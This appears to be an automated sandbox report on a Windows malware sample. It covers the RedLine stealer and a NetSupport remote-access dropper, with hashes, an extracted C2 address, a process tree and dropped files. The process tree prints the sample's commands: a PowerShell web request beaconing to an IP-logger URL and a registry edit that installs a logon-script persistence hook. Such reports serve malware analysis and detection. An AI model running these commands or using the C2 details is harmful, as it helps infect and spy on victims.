Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-11-2024 14:52

General

  • Target

    c2c6e13f08cd8b5bf721576ca1372b72cdf0c33d8aafac2e529f3aa3c73a6a80.exe

  • Size

    3.2MB

  • MD5

    c3e6ed24af33b5ea3f971939749cb6a1

  • SHA1

    b0f6eb6d427ca251790dc74d2f82d6943d0376a0

  • SHA256

    c2c6e13f08cd8b5bf721576ca1372b72cdf0c33d8aafac2e529f3aa3c73a6a80

  • SHA512

    79eff14ee676eb2f3d0f6274ed246177a2015c6beff2b6924bf48914ef022b83ccaa8cc0804da77d714615aed7aeb869ae3b35b21cc76f73ed4e7cb3df7d5a54

  • SSDEEP

    98304:kr9uY//nZ+dvt9bOqDzKHVBEu4SsJnFQyluV3knhfq6pO:o9//Z+dv/OM21CrSrVYq6pO

Malware Config

Extracted

Family

redline

Botnet

2

C2

94.158.244.106:42091

Attributes
  • auth_value

    97b1012a1f2da1b5d673765c85a9d94c

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Registers new Windows logon scripts automatically executed at logon. 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c2c6e13f08cd8b5bf721576ca1372b72cdf0c33d8aafac2e529f3aa3c73a6a80.exe
    "C:\Users\Admin\AppData\Local\Temp\c2c6e13f08cd8b5bf721576ca1372b72cdf0c33d8aafac2e529f3aa3c73a6a80.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "eng.exe" & start "" "Ordurous.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/2VYjS4"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Users\Admin\AppData\Local\Temp\eng.exe
        "eng.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7z7A9A4848\ics.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4928
          • C:\Windows\SysWOW64\expand.exe
            expand ics.cab -F:* C:\ProgramData
            5⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:4048
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d C:\ProgramData\icsxml\pcictl.exe /f
            5⤵
            • Registers new Windows logon scripts automatically executed at logon.
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:2096
          • C:\ProgramData\icsxml\pcictl.exe
            C:\ProgramData\icsxml\pcictl.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:872
      • C:\Users\Admin\AppData\Local\Temp\Ordurous.exe
        "Ordurous.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3652
        • C:\Users\Admin\AppData\Local\Temp\Ordurous.exe
          C:\Users\Admin\AppData\Local\Temp\Ordurous.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3116
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 744
            5⤵
            • Program crash
            PID:2808
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.com/2VYjS4"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:664
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3116 -ip 3116
    1⤵
      PID:2168

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\icsxml\HTCTL32.DLL

      Filesize

      320KB

      MD5

      c94005d2dcd2a54e40510344e0bb9435

      SHA1

      55b4a1620c5d0113811242c20bd9870a1e31d542

      SHA256

      3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

      SHA512

      2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

    • C:\ProgramData\icsxml\NSM.LIC

      Filesize

      195B

      MD5

      e9609072de9c29dc1963be208948ba44

      SHA1

      03bbe27d0d1ba651ff43363587d3d6d2e170060f

      SHA256

      dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

      SHA512

      f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

    • C:\ProgramData\icsxml\PCICHEK.DLL

      Filesize

      18KB

      MD5

      104b30fef04433a2d2fd1d5f99f179fe

      SHA1

      ecb08e224a2f2772d1e53675bedc4b2c50485a41

      SHA256

      956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

      SHA512

      5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

    • C:\ProgramData\icsxml\PCICL32.dll

      Filesize

      3.6MB

      MD5

      d3d39180e85700f72aaae25e40c125ff

      SHA1

      f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

      SHA256

      38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

      SHA512

      471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

    • C:\ProgramData\icsxml\TCCTL32.DLL

      Filesize

      387KB

      MD5

      2c88d947a5794cf995d2f465f1cb9d10

      SHA1

      c0ff9ea43771d712fe1878dbb6b9d7a201759389

      SHA256

      2b92ea2a7d2be8d64c84ea71614d0007c12d6075756313d61ddc40e4c4dd910e

      SHA512

      e55679ff66ded375a422a35d0f92b3ac825674894ae210dbef3642e4fc232c73114077e84eae45c6e99a60ef4811f4a900b680c3bf69214959fa152a3dfbe542

    • C:\ProgramData\icsxml\client32.ini

      Filesize

      615B

      MD5

      d38b0753c2816a57fc41b91b5bdf92c7

      SHA1

      d8e50ae1fc7957053829a1429acb4885e60c6e54

      SHA256

      160d50c13ae3b076926410875750e6e535115dba98f9445bdb947b3fe5ba53c9

      SHA512

      7d8a82708614b0b44208ceddc363ca552d8b2e89eb056088f2de89874bec76ac6eda4e47bc3bca6b168e28329debe2b23b8bb5f69574dd1f39a6303a73c5c844

    • C:\ProgramData\icsxml\msvcr100.dll

      Filesize

      755KB

      MD5

      0e37fbfa79d349d672456923ec5fbbe3

      SHA1

      4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

      SHA256

      8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

      SHA512

      2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

    • C:\ProgramData\icsxml\pcicapi.dll

      Filesize

      32KB

      MD5

      34dfb87e4200d852d1fb45dc48f93cfc

      SHA1

      35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

      SHA256

      2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

      SHA512

      f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

    • C:\ProgramData\icsxml\pcictl.exe

      Filesize

      103KB

      MD5

      c60ac6a6e6e582ab0ecb1fdbd607705b

      SHA1

      ba9de479beb82fd97bbdfbc04ef22e08224724ba

      SHA256

      4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87

      SHA512

      f91b964f8b9a0e7445fc260b8c75c831e7ce462701a64a39989304468c9c5ab5d1e8bfe376940484f824b399aef903bf51c679fcf45208426fff7e4e518482ca

    • C:\Users\Admin\AppData\Local\Temp\7z7A9A4848\ics.bat

      Filesize

      1KB

      MD5

      6a9da52824425c347a0d7c2ed8d3204a

      SHA1

      b4248c8415432106e31e9546dd61e415cd537623

      SHA256

      0080ec43a4e9bcdeb9c0ce19945da83995707cd3420133e2bea00953f626e80b

      SHA512

      6f32faa0f9817a1479cf7757bb11d630d8684869ed1482e5369f4f3948793cbb1974b7a04c1796060da493353c3b8a8ab0b20e72d8ae75944de3d9c57e858af4

    • C:\Users\Admin\AppData\Local\Temp\7z7A9A4848\ics.cab

      Filesize

      2.1MB

      MD5

      a51fadf427183e751a0ac0b2d788b083

      SHA1

      aecc6d899caa9fc2b5000e3bef9e9ba5dd1b6277

      SHA256

      1c4c12514f32bcf624b0b5f4e692967b5d4a48ec5c3445d8c0a19cb25ff5e25f

      SHA512

      a9e9e43f986354514b6fdc4bd944e4568f6428564b678c7d7e5bcdc4f44f7584e17360029fa22f9b7d0a91285ce6e7afbb35afc27e3cd35fe846dfa8d9e7249b

    • C:\Users\Admin\AppData\Local\Temp\Ordurous.exe

      Filesize

      537KB

      MD5

      caf008515453f4d6a222c966356831eb

      SHA1

      0496a3587fc272e8b7ebecd91aac4a10800be5c0

      SHA256

      4b6b0a34ad73552d204aaeef9cbd0fb6dfef1029e6edec1a1788de872f4a306b

      SHA512

      34ab48b4799d05b757a7620f15a4124edd8fe1820ba5da410d6fdded021346cb5e26dace3c760b8635071221ee8ff5d25db896f1c14e77b38233f8200afc9ae9

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_drj5g3l4.3jw.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\eng.exe

      Filesize

      2.5MB

      MD5

      e8ba3cd3e42a1fcab093ff7a6deb796b

      SHA1

      f0da57a878afcf71fdbf26042f33821fbd139d6c

      SHA256

      ed8692011421fdd2560ade9a0812c1ec0f11e48e8781ba0c9fd11d4f169d0c32

      SHA512

      ab43521b7ea1b766405bdb65af97152281dc76063e6aba3c18fbd9ce2c70e48d4c31441a391a1ad9f6e86160d2caa7af7256c8a3dbf7ae0348822ac892ef5c7d

    • C:\Users\Admin\AppData\Local\Temp\nscB259.tmp\7OUH1A.dll

      Filesize

      6KB

      MD5

      293165db1e46070410b4209519e67494

      SHA1

      777b96a4f74b6c34d43a4e7c7e656757d1c97f01

      SHA256

      49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

      SHA512

      97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

    • memory/664-31-0x0000000005290000-0x00000000052B2000-memory.dmp

      Filesize

      136KB

    • memory/664-34-0x0000000005B50000-0x0000000005BB6000-memory.dmp

      Filesize

      408KB

    • memory/664-110-0x00000000077A0000-0x0000000007E1A000-memory.dmp

      Filesize

      6.5MB

    • memory/664-27-0x0000000073E70000-0x0000000074620000-memory.dmp

      Filesize

      7.7MB

    • memory/664-46-0x0000000005BC0000-0x0000000005F14000-memory.dmp

      Filesize

      3.3MB

    • memory/664-111-0x0000000006650000-0x000000000666A000-memory.dmp

      Filesize

      104KB

    • memory/664-33-0x0000000005AE0000-0x0000000005B46000-memory.dmp

      Filesize

      408KB

    • memory/664-24-0x0000000073E70000-0x0000000074620000-memory.dmp

      Filesize

      7.7MB

    • memory/664-23-0x0000000005340000-0x0000000005968000-memory.dmp

      Filesize

      6.2MB

    • memory/664-49-0x0000000004EC0000-0x0000000004EDE000-memory.dmp

      Filesize

      120KB

    • memory/664-50-0x0000000006170000-0x00000000061BC000-memory.dmp

      Filesize

      304KB

    • memory/664-21-0x0000000073E70000-0x0000000074620000-memory.dmp

      Filesize

      7.7MB

    • memory/664-22-0x0000000002B70000-0x0000000002BA6000-memory.dmp

      Filesize

      216KB

    • memory/664-114-0x0000000073E70000-0x0000000074620000-memory.dmp

      Filesize

      7.7MB

    • memory/3116-117-0x0000000000400000-0x0000000000438000-memory.dmp

      Filesize

      224KB

    • memory/3652-28-0x0000000008410000-0x00000000089B4000-memory.dmp

      Filesize

      5.6MB

    • memory/3652-35-0x0000000073E70000-0x0000000074620000-memory.dmp

      Filesize

      7.7MB

    • memory/3652-36-0x0000000008000000-0x000000000801E000-memory.dmp

      Filesize

      120KB

    • memory/3652-32-0x0000000008080000-0x00000000080F6000-memory.dmp

      Filesize

      472KB

    • memory/3652-30-0x0000000003200000-0x0000000003206000-memory.dmp

      Filesize

      24KB

    • memory/3652-29-0x0000000007E60000-0x0000000007EF2000-memory.dmp

      Filesize

      584KB

    • memory/3652-26-0x0000000007D10000-0x0000000007E5A000-memory.dmp

      Filesize

      1.3MB

    • memory/3652-19-0x0000000000F00000-0x0000000000F8C000-memory.dmp

      Filesize

      560KB

    • memory/3652-18-0x0000000073E7E000-0x0000000073E7F000-memory.dmp

      Filesize

      4KB

    • memory/3652-120-0x0000000073E70000-0x0000000074620000-memory.dmp

      Filesize

      7.7MB